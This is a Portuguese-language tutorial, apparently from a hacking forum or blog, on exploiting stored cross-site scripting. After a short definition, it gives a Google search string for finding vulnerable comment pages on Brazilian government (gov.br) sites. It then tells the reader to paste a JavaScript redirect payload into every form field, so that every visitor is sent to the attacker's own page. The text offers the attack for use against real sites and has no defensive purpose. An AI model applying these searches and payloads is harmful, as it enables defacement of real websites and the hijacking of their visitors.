Vulnerabilidade XSS

O que é XSS ?
XSS também conhecido como CSS (Cross Site Scripting, facilmente confundido com Cascading Style Sheets) é uma vulnerabilidade muito comum encontrada em aplicativos web. XSS permite ao atacante inserir códigos maliciosos nessas páginas, para que sejam executados no momento em que tais páginas forem acessadas.
A Tecnica XSS e um pouco antiga mais em alguns sites ainda funciona.

Categorias: , , ,

Descrição

O que é XSS ?
XSS também conhecido como CSS (Cross Site Scripting, facilmente confundido com Cascading Style Sheets) é uma vulnerabilidade muito comum encontrada em aplicativos web. XSS permite ao atacante inserir códigos maliciosos nessas páginas, para que sejam executados no momento em que tais páginas forem acessadas.
A Tecnica XSS e um pouco antiga mais em alguns sites ainda funciona.

1°Passo: Achar um site vulneravel.

Vamos no google e usar um metodo de pesquisa digitando:
inurl:”gov.br” & inurl:”mostrar=comentarios”

Irão aparecer varios sites,mas como saber se é vulneravel?
Abra uma pagina e veja que você pode comentar digite
qualquer coisa para saber se e vulneravel,depois envie
Se aparecer seu comentário significa que é vulneravel…

2°Passo: Fazendo Script
Agora chegou a hora de fazer seu script, aconselho
criar uma index em um host gratis na internet…
O script que vamos usar e um redirecionamento para sua index.
Script: <script>window.location.href=”Site da index”</script>
E vamos colocar em todos os campos assim:

Nome:<script>window.location.href=”Site da index”</script>
ICQ:<script>window.location.href=”Site da index”</script>
Titulo:<script>window.location.href=”Site da index”</script>
Mensagem:<script>window.location.href=”Site da index”</script>
Email:<script>window.location.href=”Site da index”</script>@hotmail.com
MSN:<script>window.location.href=”Site da index”</script>@hotmail.com

Observe que em Email e MSN eu usei @hotmail.com
(“Site da index”) e o site da sua index ou imagem…

Fez em todos os campos agora clique em adicionar
Feito a pagina de comentarios não fica e ela redireciona para sua,
Todos que clicarem naquela noticia serão redirecionadas para sua index